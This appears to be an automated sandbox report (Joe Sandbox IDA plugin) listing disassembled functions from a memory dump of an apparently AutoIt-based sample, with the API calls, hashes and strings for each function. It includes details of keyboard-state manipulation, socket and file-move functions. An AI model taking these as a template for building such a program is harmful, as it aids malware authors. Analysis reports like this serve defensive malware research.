Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
Instruction ID: 3cfef033c9ce3f93cf7c1a18841e678bb550f48fb2aa5bbc82f9840e0c3637ed
Opcode Fuzzy Hash: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
Instruction Fuzzy Hash: D8414A71614688BAC7789F39A98C73A7B91BF56318F54403CF34B52560C7F2A8D2CB10

Function 00272D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00272D1B
GetDC.USER32(00000000), ref: 00272D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00272D2E
ReleaseDC.USER32(00000000,00000000), ref: 00272D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00272D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00272D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00275A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00272DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00272DE1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
Instruction ID: e690f8b19eb9d69ec3d8eedba8cb5c39baa7a57b188020a61d36d20d909f1e43
Opcode Fuzzy Hash: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
Instruction Fuzzy Hash: 80319C72211214BFEB258F60DC8AFEB3BADEF49711F144059FE0C9A291C6759C90CBA0

Function 00245622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00245637
_memcmp.LIBVCRUNTIME ref: 00245659
_memcmp.LIBVCRUNTIME ref: 00245671
_memcmp.LIBVCRUNTIME ref: 00245684
_memcmp.LIBVCRUNTIME ref: 0024569E
_memcmp.LIBVCRUNTIME ref: 002456B1
_memcmp.LIBVCRUNTIME ref: 002456C9
_memcmp.LIBVCRUNTIME ref: 002456E4

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
Instruction ID: 50b0887f3ba80f429f8a8581c051d9a6a258700d280dad55f3a265d03b2b7ef0
Opcode Fuzzy Hash: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
Instruction Fuzzy Hash: 1021F561674A2A77D31D9A208F82FBA334CAE22784F454035FD489A687F770ED3189A5

Function 00264FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0026502E, 00265383
Not an Object type, xrefs: 00265007

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 61b24195301231d4dd4427347e7e58f4440fc077ae9f8feb8a29abd3f7ccf72f
Instruction ID: f76df16a1a8c3fbd88c0795d13c376575b9f87d629269acbb858d2ddf35da799
Opcode Fuzzy Hash: 61b24195301231d4dd4427347e7e58f4440fc077ae9f8feb8a29abd3f7ccf72f
Instruction Fuzzy Hash: 97D1D571A1061AAFDF10CFA8C891FAEB7B5FF48344F148069E915AB281E770DDA5CB50

Function 00221522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002217FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002215CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002217FB,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216FB

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221777
__freea.LIBCMT ref: 002217A2
__freea.LIBCMT ref: 002217AE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
Instruction ID: e7fbfce5b77e4366f7187f831aa81a4daf129431522ea796f8fae5c1aa909dfd
Opcode Fuzzy Hash: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
Instruction Fuzzy Hash: BA91A571E202267ADB208EF4E841EEEBBB59FA9310F580569E805E7181D725CD70CBA0

Function 00264523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00264648
VariantInit.OLEAUT32(?), ref: 00264749
VariantClear.OLEAUT32(?), ref: 00264753
VariantClear.OLEAUT32(?), ref: 002647B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 002645D8, 00264706, 002647BE
Incorrect Object type in FOR..IN loop, xrefs: 0026472C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 668164285d51cb8a3af1d2a3f81c7e8593082b7977791793b9c5aa358c686d80
Instruction ID: 30272711517092beff976ae884172cd4dba02d75a932bbb1a323f511c582afc5
Opcode Fuzzy Hash: 668164285d51cb8a3af1d2a3f81c7e8593082b7977791793b9c5aa358c686d80
Instruction Fuzzy Hash: F491C371A20219AFDF20DFA4CC84FAEB7B8EF46714F108559F545AB280D7709995CFA0

Function 00251187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0025125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00251284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002512A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002512D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0025135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002513C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00251430

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 6e1938d845949ad3bccc8e70a94786609102a542a107c9ebdb8ad5f208c37769
Instruction ID: 388aa0a498f2ea1b27b1f70ec567dd59b26eb7300335603ffcca68aa68e88252
Opcode Fuzzy Hash: 6e1938d845949ad3bccc8e70a94786609102a542a107c9ebdb8ad5f208c37769
Instruction Fuzzy Hash: 04910371A20219AFEB00DFA4D895BBE77B5FF44316F104029ED00E7291D7B4A969CF98

Function 001F948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
Instruction ID: 6b626bd718b68014c806628ba898ee1155047e74d4cca41d216c7e0e310b8c47
Opcode Fuzzy Hash: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
Instruction Fuzzy Hash: 0F913AB1D00219EFCB14DFA9CC88AEEBBB8FF49320F14455AE615B7261D375A941CB60

Function 00263947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0026396B
CharUpperBuffW.USER32(?,?), ref: 00263A7A
_wcslen.LIBCMT ref: 00263A8A
VariantClear.OLEAUT32(?), ref: 00263C1F

Part of subcall function 00250CDF: VariantInit.OLEAUT32(00000000), ref: 00250D1F
Part of subcall function 00250CDF: VariantCopy.OLEAUT32(?,?), ref: 00250D28
Part of subcall function 00250CDF: VariantClear.OLEAUT32(?), ref: 00250D34

Strings

AUTOIT.ERROR, xrefs: 00263A80, 00263A85
Incorrect Parameter format, xrefs: 002639A6, 00263BA1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: b6e5e720c3a1499273534f4ae052e63dfd14589e404229e68fb204ebd6ef0a95
Instruction ID: c6e20a080f82a6bb7dc4449e14cd23b5413913e5bb95db7b4871a4997f7621aa
Opcode Fuzzy Hash: b6e5e720c3a1499273534f4ae052e63dfd14589e404229e68fb204ebd6ef0a95
Instruction Fuzzy Hash: 589144746287459FC704EF64C48196AB7E4FF89314F14882EF88A9B351DB30EE95CB92

Function 00264BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0024000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
Part of subcall function 0024000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
Part of subcall function 0024000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
Part of subcall function 0024000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00264C51
_wcslen.LIBCMT ref: 00264D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00264DCF
CoTaskMemFree.OLE32(?), ref: 00264DDA

Strings

NULL Pointer assignment, xrefs: 00264E23, 00264E52

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
Instruction ID: fb3044032cfbe85f06204f5cfd97db33e80b025e7cec6ca8c67f44cd26dc98ac
Opcode Fuzzy Hash: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
Instruction Fuzzy Hash: B1913771D1021DAFDF14EFA4D881EEEB7B8BF08304F50816AE955A7251DB309A94CF60

Function 002720FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00272183
GetMenuItemCount.USER32(00000000), ref: 002721B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002721DD
_wcslen.LIBCMT ref: 00272213
GetMenuItemID.USER32(?,?), ref: 0027224D
GetSubMenu.USER32(?,?), ref: 0027225B

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002722E3

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: d95f3847b8033f2dfe15466e20c13987e183af6d524bbf07eeb00559e144fff4
Instruction ID: d4cec0b4d60caf9f5a6588fb3599c231ec339d9bca2ac07e0762c6469ecab2b3
Opcode Fuzzy Hash: d95f3847b8033f2dfe15466e20c13987e183af6d524bbf07eeb00559e144fff4
Instruction Fuzzy Hash: DF718D75A10205EFCB10DF69C885AAEB7F5FF48310F148499E81AEB342DB74EE558B90

Function 0024AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0024AEF9
GetKeyboardState.USER32(?), ref: 0024AF0E
SetKeyboardState.USER32(?), ref: 0024AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0024AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0024AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0024AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0024B020

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
Instruction ID: 8c72ede99a3711460848573fbb1da50a4c03d1d7d5d54b4dc299645ee95d58b2
Opcode Fuzzy Hash: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
Instruction Fuzzy Hash: 8951D4A0A647D63DFB3B86348C45BBB7EE95B06304F088489E1D9498C2C3D9EDE8D751

Function 0024ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0024AD19
GetKeyboardState.USER32(?), ref: 0024AD2E
SetKeyboardState.USER32(?), ref: 0024AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0024ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0024ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0024AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0024AE38

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
Instruction ID: bdfc5b0092fec81045aecd28d9aca49a15bdbef5c97004eb9a56d54d65835bb7
Opcode Fuzzy Hash: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
Instruction Fuzzy Hash: EE51F9A1AA87D67DFB3F87348C85B7A7E985F45300F088498E1E54A8C3C294ECA4D752

Function 0021542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00223CD6,?,?,?,?,?,?,?,?,00215BA3,?,?,00223CD6,?,?), ref: 00215470
__fassign.LIBCMT ref: 002154EB
__fassign.LIBCMT ref: 00215506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00223CD6,00000005,00000000,00000000), ref: 0021552C
WriteFile.KERNEL32(?,00223CD6,00000000,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 0021554B
WriteFile.KERNEL32(?,?,00000001,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 00215584

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
Instruction ID: 1db92c435b47c0f23a9823f8ca2d5993efbc1903a8d8ea7a6ab3d088f0906e2a
Opcode Fuzzy Hash: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
Instruction Fuzzy Hash: 8B510570A10609EFDB10CFA8D885BEEBBFAEF59300F14415AF555E3291D7309A91CB60

Function 002610B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00261112
WSAGetLastError.WSOCK32 ref: 00261121
WSAGetLastError.WSOCK32 ref: 002611C9
closesocket.WSOCK32(00000000), ref: 002611F9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
Instruction ID: 8545d21528b9e0b9151562f8f33cf6984e12002caef7b41978b4be84154c587e
Opcode Fuzzy Hash: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
Instruction Fuzzy Hash: D9411431210604AFDB109F24D888BAEB7E9EF46324F188099F9199B291C770BD91CBE1

Function 0024CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16

lstrcmpiW.KERNEL32(?,?), ref: 0024CF45
MoveFileW.KERNEL32(?,?), ref: 0024CF7F
_wcslen.LIBCMT ref: 0024D005
_wcslen.LIBCMT ref: 0024D01B
SHFileOperationW.SHELL32(?), ref: 0024D061

Strings

\*.*, xrefs: 0024CFF3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
Instruction ID: 5f83144a87b17275691cbe54199a8b80a1c58137a4b91fc9576c57ecfff34fbd
Opcode Fuzzy Hash: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
Instruction Fuzzy Hash: A941A9719562199FDF16EFA4D981EDEB7B8AF04340F1100E6E509EB142EB34AA98CF10

Function 00272DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00272E1C
